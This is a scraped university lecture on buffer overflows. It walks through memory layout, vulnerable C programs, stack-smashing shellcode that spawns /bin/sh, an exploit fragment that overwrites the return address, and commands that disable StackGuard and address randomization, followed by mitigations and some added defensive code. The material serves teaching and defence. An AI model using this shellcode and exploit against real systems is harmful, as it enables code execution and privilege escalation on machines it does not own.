Lecture: Buffer Overflow - Iowa State University (home.eng.iastate.edu/~othmanel/files/cpre562/lecture...)

Post on 19-Jan-2021


Lecture: Buffer Overflow

Lotfi ben Othmane

• What is a buffer overflow?
• How to exploit a buffer overflow?
• What are the mitigation techniques?
• How to detect a buffer overflow?

2

Plan

3

Memory Layout

Figure: memory layout from high address to low address: Stack, Heap, BSS segment, Data segment, Text segment

#include <string.h>
#include <stdio.h>
#include <stdlib.h>

int x = 100;          // initialized global: data segment

int main() {
    // data stored on stack
    int a = 2;
    float b = 2.5;
    static int y;     // uninitialized static: BSS segment
    // allocate memory on heap
    int *ptr = (int *) malloc(2 * sizeof(int));
    // values 5 and 6 stored on heap
    ptr[0] = 5;
    ptr[1] = 6;
    // deallocate memory on heap
    free(ptr);
    return 1;
}

4

Memory Layout

Example1.c

✓ x is at 0x804a01c content 100
✓ a is at 0xbff21cd4 content 2
✓ b is at 0xbff21cd8 content 2.500000
✓ y is at 0x804a028 content 0
✓ ptr is at 0xbff21cdc, content 0x8f64008
✓ ptr is at 0x8f64008, content 5
✓ ptr is at 0x8f6400c, content 6

5

Memory Layout

Figure: Example1.c variables annotated by segment: data segment, stack, BSS segment, heap

#include <string.h>
#include <stdio.h>
#include <stdlib.h>

int x = 100;          // initialized global: data segment

int main() {
    // data stored on stack
    int a = 2;
    float b = 2.5;
    static int y;     // uninitialized static: BSS segment
    // allocate memory on heap
    int *ptr = (int *) malloc(2 * sizeof(int));
    // values 5 and 6 stored on heap
    ptr[0] = 5;
    ptr[1] = 6;
    // deallocate memory on heap
    free(ptr);
    return 1;
}

Stack

int main() {
    char buffer2[50];
    char buffer[12];
    char *str = "This is definitely longer than 12";
    strcpy(buffer, str);   // copies 34 bytes into a 12-byte buffer
    return 1;
}

6

Simple Buffer Overflow

What is the content of buffer?

What is the content of buffer2?

Example2.c

Buffer overflow: more data is copied to the destination buffer than the size of the allocated space.

7

Buffer Overflow

8

Simple Buffer Overflow

int main() {
    char buffer2[50];
    char buffer[12];
    char *str = "This is definitely longer than 12";
    strcpy(buffer, str);
    return 1;
}

9

Simple Buffer Overflow

Example2.c

*** stack smashing detected ***

Stackguard: mechanism to detect changes to specific data stored in the stack

Disable: gcc [filename.c] -fno-stack-protector

10

Protection Mechanism 1 - Stackguard

11

Protection Mechanism - Stackguard

Figure: stack frame with StackGuard, from high address to low address: Return Address, Guard, Buffer[11] … Buffer[0]

Code inserted by compiler:

Set the guard (function prologue):
    movl %gs:20, %eax
    movl %eax, -12(%ebp)
    xorl %eax, %eax

Check the guard (function epilogue):
    movl -12(%ebp), %eax
    xorl %gs:20, %eax
    je .L2
    call __stack_chk_fail
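The guard check above can be modelled in plain C without touching the real stack frame. The block below is an added example, not code from the lecture: it places a guard word directly after a 12-byte buffer (the Example2.c size) inside a struct, performs an unchecked copy into the buffer, and then runs the same comparison the compiler emits. The guard value and the struct are constructed for the demo; a real StackGuard canary is read from %gs:20 and differs per process.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of a StackGuard-protected frame: a 12-byte buffer
 * followed by a guard word.  Copying through the struct as raw bytes keeps
 * the demo within defined behaviour while still letting the copy run past
 * the end of buf[] into the guard. */
struct guarded_frame {
    char buf[12];
    uint32_t guard;
};

#define GUARD_VALUE 0xDEADC0DEu   /* stands in for the per-process value at %gs:20 */

/* Copies n bytes of src into the frame with no bounds check (like strcpy),
 * then performs the compiler's check: is the guard still equal to the
 * reference value?  Returns 1 if the guard is intact, 0 if it was smashed. */
int copy_and_check_guard(const char *src, size_t n)
{
    struct guarded_frame frame;
    memset(&frame, 0, sizeof frame);
    frame.guard = GUARD_VALUE;                 /* set the guard */
    if (n > sizeof frame)                      /* keep the demo inside the struct */
        n = sizeof frame;
    memcpy((unsigned char *)&frame, src, n);   /* the unchecked copy */
    return frame.guard == GUARD_VALUE;         /* check the guard */
}

int main(void)
{
    const char *fits = "short";
    const char *overflows = "This is definitely longer than 12";
    printf("\"%s\": guard %s\n", fits,
           copy_and_check_guard(fits, strlen(fits) + 1) ? "intact" : "SMASHED");
    printf("\"%s\": guard %s\n", overflows,
           copy_and_check_guard(overflows, strlen(overflows) + 1) ? "intact" : "SMASHED");
    return 0;
}
```

A copy of at most 12 bytes (11 characters plus the terminator) leaves the guard untouched; the 13th byte already lands on the guard, which is exactly what lets the epilogue check raise "stack smashing detected" before the function returns.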

int main() {
    char buffer[12];
    char buffer2[50];
    char *str = "This is definitely longer than 12";
    strcpy(buffer, str);
    return 1;
}

12

Simple Buffer Overflow

What is the content of buffer?

What is the content of buffer2?

Let’s change the order of buffer and buffer2. Can we still have the overflow?

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main() {
    char *input = (char *) malloc(1);    // 1-byte heap chunks
    char *secret = (char *) malloc(1);
    strcpy(secret, "Password");          // writes 9 bytes into a 1-byte chunk
    printf("Enter password");
    scanf("%s", input);                  // unbounded read into a 1-byte chunk
    if (strncmp(input, secret, 10) == 0) {
        printf("Access granted");
    } else {
        printf("Access Denied");
    }
    return 0;
}

13

Heap-based Buffer Overflow

Example3.c

Can we get access without entering the correct password?

#include <stdio.h>
#include <string.h>

int main() {
    char buff[10];
    int pass = 0;
    char secret[10];
    strcpy(buff, "Password");
    printf("\n Enter your password: ");
    gets(secret);                        // no length bound on the input
    if (strcmp(secret, buff)) {
        printf("\n Wrong Password \n");
    } else {
        printf("\n Correct Password \n");
        pass = 1;
    }
    if (pass)
        printf("\n Root privileges given to the user \n");
    return 0;
}

14

So What?

Example4.c

Can we get access without entering the correct password?

How can we better use the weakness?
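Both Example3.c and Example4.c share one root cause: the password is read with no length bound (scanf("%s"), gets) into a buffer that sits next to other security-relevant data. The block below is an added example, not the lecture's code, showing the defensive shape of Example4.c: the line is read with fgets into a fixed buffer, an overlong line is drained and rejected, and the grant decision is derived only from a bounded comparison. The PASS_MAX size and the expected password are taken from Example4.c; fmemopen in the string helper is a POSIX call used so the functions can be exercised without a terminal.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen */
#include <stdio.h>
#include <string.h>

#define PASS_MAX 10   /* same 10-byte buffer as Example4.c */

/* Reads one line from `in` into buf with a size bound (fgets, not gets).
 * Returns 0 on success, -1 on EOF/error, -2 if the line did not fit; in the
 * last case the rest of the line is drained so it is not read as the next
 * input. */
int read_line_bounded(FILE *in, char *buf, size_t bufsz)
{
    if (fgets(buf, (int)bufsz, in) == NULL)
        return -1;
    char *nl = strchr(buf, '\n');
    if (nl) { *nl = '\0'; return 0; }
    /* no newline in buf: either the last line of the input or an overlong line */
    int c, overlong = 0;
    while ((c = fgetc(in)) != EOF && c != '\n')
        overlong = 1;
    return overlong ? -2 : 0;
}

/* 1 if input matches the expected password, 0 otherwise.  The length test
 * guarantees the comparison never runs past either buffer. */
int check_password(const char *input)
{
    static const char expected[PASS_MAX] = "Password";
    if (strlen(input) >= PASS_MAX)
        return 0;
    return strncmp(input, expected, PASS_MAX) == 0;
}

/* Reads a password line from `in`; 1 = granted, 0 = denied.  There is no
 * separate `pass` flag that an overflow could flip: the result is the
 * comparison itself. */
int authenticate(FILE *in)
{
    char secret[PASS_MAX];
    if (read_line_bounded(in, secret, sizeof secret) != 0)
        return 0;   /* EOF or overlong line: deny */
    return check_password(secret);
}

/* Helper for testing: feeds a constructed input line through authenticate(). */
int authenticate_string(const char *line)
{
    FILE *f = fmemopen((void *)line, strlen(line), "r");
    if (!f) return 0;
    int granted = authenticate(f);
    fclose(f);
    return granted;
}

int main(void)
{
    printf("\n Enter your password: ");
    if (authenticate(stdin))
        printf("\n Correct Password \n");
    else
        printf("\n Wrong Password \n");
    return 0;
}
```

The comparison against a hard-coded password is kept only to mirror the lecture's example; the point of the block is the bounded read and the absence of a separately stored grant flag.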

15

Uses of Buffer Overflow

int bof(char *str) {
    char buffer[24];
    strcpy(buffer, str);
    return 1;
}

16

Stack Memory Layout

int main(int argc, char **argv) {
    char str[517];
    FILE *badfile;
    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);
    printf("Returned Properly\n");
    return 1;
}

stack.c

int bof(char *str) {
    char buffer[24];
    strcpy(buffer, str);
    return 1;
}

17

Stack Memory Layout

Figure: stack frame of bof(), from high address to low address:
• Arguments: value of *str
• Return Address
• Previous Frame pointer (the current frame pointer points here)
• Local variables: value of buffer

18

Stack Buffer Overflow

int bof(char *str) {
    char buffer[24];
    strcpy(buffer, str);
    return 1;
}

int main(int argc, char **argv) {
    char str[517];
    FILE *badfile;
    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);
    printf("Returned Properly\n");
    return 1;
}

Example5.c

Can we have code in “badfile”?

#include <stdio.h>
#include <unistd.h>

int main() {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
    return 0;
}

19

Exploit - Shell Code

“\x31\xc0" /* xorl %eax,%eax */"\x50" /* pushl %eax */"\x68""//sh" /* pushl $0x68732f2f */"\x68""/bin" /* pushl $0x6e69622f */"\x89\xe3" /* movl %esp,%ebx */"\x50" /* pushl %eax */"\x53" /* pushl %ebx */"\x89\xe1" /* movl %esp,%ecx */"\x99" /* cdql */"\xb0\x0b" /* movb $0x0b,%al */"\xcd\x80" /* int $0x80 */

20

Shell Exploit

int bof(char *str) {
    char buffer[24];
    strcpy(buffer, str);
    return 1;
}

21

Stack Memory Layout for Functions

Exploit

Figure: stack frame of bof(), from high address to low address:
• Arguments
• Return Address
• Previous Frame pointer (the current frame pointer points here)
• Local variables: value of buffer

Can we change the return address?

22

Exploit

Figure: stack frame of bof(), from high address to low address:
• Arguments
• Return Address
• Previous Frame pointer (the current frame pointer points here)
• Local variables: value of buffer

Stack Memory Layout for Functions

23

Stack Overflow

void *readaddress() {
    asm("movl %ebp, %eax");   // return the frame pointer (eax carries the return value on 32-bit x86)
}

int bof(char *str) {
    char buffer[24];
    printf("\n Address of buffer %p", &buffer);
    printf("\n Ebp %p", readaddress());
    return 1;
}

Example5.c

addr = 0xbffff148 + offset;
ptr = buffer;
addr_ptr = (long *)(ptr);
for (i = 0; i < 10; i++)
    *(addr_ptr++) = addr;
memcpy(buffer + sizeof(buffer) - sizeof(shellcode), shellcode, sizeof(shellcode));

24

Final Exploit

Exploit_final.c

25

Stack Overflow

int bof(char *str) {
    char buffer[24];
    strcpy(buffer, str);
    return 1;
}

int main(int argc, char **argv) {
    char str[517];
    FILE *badfile;
    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);
    printf("Returned Properly\n");
    return 1;
}

stack.c

Are we ready?

Perform the attack

We observe that the program does not display: Returned Properly

26

#include <string.h>
#include <netdb.h>
#include <arpa/inet.h>

void host_lookup(char *user_supplied_addr) {
    struct hostent *hp;
    in_addr_t addr;
    char hostname[64];

    validate_addr_form(user_supplied_addr);
    addr = inet_addr(user_supplied_addr);
    hp = gethostbyaddr(&addr, sizeof(struct in_addr), AF_INET);
    strcpy(hostname, hp->h_name);   // h_name is attacker-influenced DNS data; no bound on the copy
}

27

Buffer Overflow in the Real World

Buffer overflows have played a major role in attacks such as:
• Morris worm of 1988
• Code Red worm of 2001
• Etc.

28

So

• Randomize the memory space of the key data areas:
  • Text segment
  • Stack
  • Heap
  • Data segment

• Disable randomization: sudo sysctl -w kernel.randomize_va_space=0 (the value 2 turns randomization on)

29

Protection 2 - Address Randomization

✓ x is at 0x804a01c content 100
✓ a is at 0xbff21cd4 content 2
✓ b is at 0xbff21cd8 content 2.500000
✓ y is at 0x804a028 content 0
✓ ptr is at 0xbff21cdc, content 0x8f64008
✓ ptr is at 0x8f64008, content 5
✓ ptr is at 0x8f6400c, content 6

30

Protection 2 - Address Randomization

Figure: Example1.c variables annotated by segment: data segment, stack, BSS segment, heap

The number of possibilities is limited and could be guessed in a few minutes.

• There are safe implementations for memory management functions

• E.g., use strncpy(destination, source, size)
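The block below is an added example, not code from the lecture, covering the defect in Example2.c, the strcpy in host_lookup(), and the strncpy advice just given. copy_bounded() is a bounded copy that always terminates the destination and reports truncation; strncpy_left_unterminated() shows the pitfall that plain strncpy leaves the destination without a terminator when the source is at least as long as the size argument; store_hostname() is the bounded shape of host_lookup()'s final copy, taking the resolved name as a parameter (an assumption made so it runs offline, instead of calling gethostbyaddr()).

```c
#include <stdio.h>
#include <string.h>

/* Bounded copy that always NUL-terminates dst.  Returns 0 when src fit and
 * -1 when it was truncated, so the caller can decide whether truncation is
 * acceptable.  This is the check strcpy() omits. */
int copy_bounded(char *dst, size_t dstsz, const char *src)
{
    if (dstsz == 0)
        return -1;
    size_t len = strlen(src);
    if (len >= dstsz) {
        memcpy(dst, src, dstsz - 1);   /* copy what fits ... */
        dst[dstsz - 1] = '\0';         /* ... and terminate explicitly */
        return -1;
    }
    memcpy(dst, src, len + 1);         /* fits, including the terminator */
    return 0;
}

/* The strncpy pitfall: returns 1 if strncpy() left the 12-byte destination
 * (Example2.c's size) with no terminator for the given source. */
int strncpy_left_unterminated(const char *src)
{
    char buf[12];
    strncpy(buf, src, sizeof buf);     /* pads with NULs only if src is shorter */
    return memchr(buf, '\0', sizeof buf) == NULL;
}

/* Bounded shape of host_lookup()'s last step.  `resolved` stands in for
 * hp->h_name (constructed parameter).  Returns 0 on success, -1 if the
 * lookup failed or the name would not fit: a hostname is not silently cut. */
int store_hostname(char *hostname, size_t hostsz, const char *resolved)
{
    if (resolved == NULL)
        return -1;                     /* gethostbyaddr() returned NULL */
    if (copy_bounded(hostname, hostsz, resolved) != 0)
        return -1;                     /* refuse to truncate a hostname */
    return 0;
}

int main(void)
{
    char buffer[12];
    const char *str = "This is definitely longer than 12";   /* Example2.c input */
    int rc = copy_bounded(buffer, sizeof buffer, str);
    printf("copy_bounded: rc=%d buffer=\"%s\"\n", rc, buffer);
    printf("strncpy left buffer unterminated: %d\n", strncpy_left_unterminated(str));
    return 0;
}
```

Any later strlen() or printf("%s") on a buffer that strncpy left unterminated reads past its end, so the explicit terminator in copy_bounded() is not optional; snprintf(dst, dstsz, "%s", src) is the other common way to get the same guarantee.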

31

Protection 3 – Defensive Functions

32

Protection 4 – Detect Vulnerabilities Using Code Analysis

From the TrueCrypt report, page 32

Code analysis: Ensure that boundaries are checked before copying

Arms race: attackers bypass protection mechanisms

33

Buffer Overflow Detection

Arada Locomate – V2V Device

34

Arada Locomate – V2V Device

Buffer overflow hypothesis at read()

35

Thank you

Any Question?

36
